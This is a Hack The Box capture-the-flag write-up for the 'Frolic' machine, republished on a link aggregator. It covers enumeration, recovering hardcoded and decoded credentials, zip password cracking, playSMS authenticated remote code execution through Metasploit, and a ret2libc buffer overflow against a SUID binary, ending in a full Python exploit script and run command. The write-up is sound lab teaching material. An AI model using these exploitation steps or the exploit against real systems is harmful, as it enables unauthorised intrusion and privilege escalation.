47

Hack The Box - Frolic

 3 years ago
source link: https://www.tuicool.com/articles/hit/qUrUFbU
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Quick Summary

Hey guys today frolic retired and here is my write-up about it. This box was more of a CTF challenge than a real world scenario , especially the user part , But it was nice because for root we will exploit a buffer overflow vulnerability. It’s a linux box and its ip is 10.10.10.111 , I added it to /etc/hosts as frolic.htb . Let’s jump right in !

RrURRbq.png!web

Nmap

As always we will start with nmap to scan for open ports and services :

nmap -sV -sT -sc frolic.htb 3eiuyyi.png!web

We got ssh on port 22 , smb on port 139 and 445 (which is not a usual thing to see on a linux box) and http on port 9999. We will take a look at http first.

HTTP Initial Enumeration

2INvMrU.png!web

By visiting port 9999 we get the welcome page of nginx , so we will use gobuster to enumerate sub directories :

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://frolic.htb:9999/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 2m0s
=====================================================
2019/03/22 12:53:58 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/admin (Status: 301)
/backup (Status: 301)
/dev (Status: 301)
/test (Status: 301)
=====================================================

We got /admin , /backup , /dev and /test .

/backup :

iiaueuV.png!web

/dev :

U3Abmuy.png!web

We got 403 on /dev , let’s run gobuster again on /dev :

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://frolic.htb:9999/dev/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 2m0s
=====================================================
2019/03/22 17:51:41 Starting gobuster
=====================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/backup (Status: 301)
/test (Status: 200)
=====================================================

We got /backup and /test

/dev/backup :

uamEzyU.png!web

/playsms , Let’s check that :

3emeeaA.png!web

It asks for authentication , we will get back to it later when we find any credentials. So that was for /dev .

/test :

ZV3eIjA.png!web

It’s just the phpinfo() page

/admin :

beYVRv3.png!web

on /admin there’s an authentication form , and the title is “c’mon i m hackable” :D

Hacking the “Hackable” form

Let’s take a look at the source code :

zyU7vez.png!web

We notice a script called login.js , maybe authentication is handled by that script.

login.js :

var attempt = 3; // Variable to count number of attempts.
// Below function Executes on click of login button.
function validate(){
var username = document.getElementById("username").value;
var password = document.getElementById("password").value;
if ( username == "admin" && password == "superduperlooperpassword_lol"){
alert ("Login successfully");
window.location = "success.html"; // Redirecting to other page.
return false;
}
else{
attempt --;// Decrementing by one.
alert("You have left "+attempt+" attempt;");
// Disabling fields after 3 attempts.
if( attempt == 0){
document.getElementById("username").disabled = true;
document.getElementById("password").disabled = true;
document.getElementById("submit").disabled = true;
return false;
}
}
}

fAVzIf7.png!web

We got the username and the password : admin:superduperlooperpassword_lol

2uqaEnU.png!webYb67Vvr.png!web

And after we login we find … this :

..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.

M3amM3a.png!web

Ook!

After searching on google for a long time I found out that this is an esoteric language called Ook! .

Read about esoteric languages here

Read about Ook! here

I used an online interpreter for Ook! on a website called dcode.fr

VVJbq23.png!web

Output :

Nothing here check /asdiSIAJJ0QWE9JAS

NN7VFj6.png!web

Playsms password

/asdiSIAJJ0QWE9JAS :

UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA

7r2yiaB.png!web

Obviously it’s base64 , so I copied it and saved it in a txt file to decode it :

BZb2M3N.png!webQ3A3yq7.png!web

We got a weird output , let’s redirect the output into a file and check what kind of files is that :

uAj2U3j.png!web

It’s a zip archive , let’s unzip it :

i2muyuN.png!web

Password protected. There’s a tool called fcrackzip we can use it to bruteforce the password :

fcrackzip file.zip -u -D -p /usr/share/wordlists/rockyou.txt

The password is “password” !

After extraction we get a file called index.php :

4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a

iE7f6ny.png!web

Hex encoded , let’s decode it. I will use a website calledCyberChef :

2ueEJva.png!web

Base64 encoded output , let’s decode one more time :

UVjAJrM.png!web

Another esoteric language. But this time it’s a famous one , brainfuck . We will use dcode.fr again :

ARRVJbi.png!web

Output :

idkwhatispass 6rYFZv6.png!web

Let’s try to login to playsms as admin with this password :

ZfuqEb6.png!web

And it worked.

Exploiting Authenticated RCE and getting user

There are some known vulnerabilities for playsms , one of them is an Authenticated CSV File Upload Code Execution (CVE-2017-9101). There’s also a metasploit module for it.

Erq22um.png!web2uYz2ir.png!web

The exploit worked and we have a meterpreter session now :

mQFna2N.png!web

We owned user !

Buffer Overflow in rop

In the home directory of the user ayush there’s a directory called .binary , which has a binary called rop . we can verify that rop is suid by using find :

find /home/ayush/.binary/ -perm -4000 eUJJz2V.png!web

Let’s see what is it doing :

3AriYrj.png!web

So it takes our input and just ouputs it , Let’s try giving it a long string :

vY3EFfR.png!web

We got a segmentation fault , so we have a buffer overflow. I will go through the exploitation without explaining everything because I have already written some posts about buffer overflow. You can check themhere

We are going to do a ret2libc attack , if you are unfamiliar with it , you can read my post about ithere

First of all , gdb is not installed on the box :

VZbamuQ.png!web

So I download a static version of gdb from github , and uploaded it to the box through the meterpreter session. upload gdb

Let’s find the length of the buffer :

FNVnuyM.png!webvaEN7bQ.png!webi6vYnaE.png!web

So the buffer overflows after 52 chars. Now we need to know the address of /bin/sh , I won’t do it like I did before by loading the string in a environment variable. There’s a better way to do it , first thing we need to find the offset of /bin/sh in libc , we will use strings to get the address :

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh RrmIbiQ.png!web

Offset : 0x0015ba0b

Then we need the address of libc , we can use ldd to get it :

ldd rop U7nMJr7.png!web

Address : 0xb7e19000

Then we will add the two addresses to get the address of /bin/sh

Address of /bin/sh : 0x0015ba0b + 0xb7e19000 = 0xb7f74a0b

Now we need the addresses of system() and exit() :

ymqMn23.png!web

Address of system() : 0xb7e53da0

Address of exit() : 0xb7e479d0

Our final exploit will be:

#!/usr/bin/python

import struct

buf = "A" * 52
system = struct.pack("I" ,0xb7e53da0)
exit = struct.pack("I" ,0xb7e479d0)
shell = struct.pack("I" ,0xb7f74a0b)
print buf + system + exit + shell

vQzMBbE.png!web

Let’s upload and run it :

./rop `python /tmp/exploit.py`

jMbMFze.png!web

And we owned root !

That’s it , Feedback is appreciated !

Don’t forget to read theprevious write-ups , Tweet about the write-up if you liked it , follow on twitter for awesome resources @Ahm3d_H3sham

Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Carrier


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK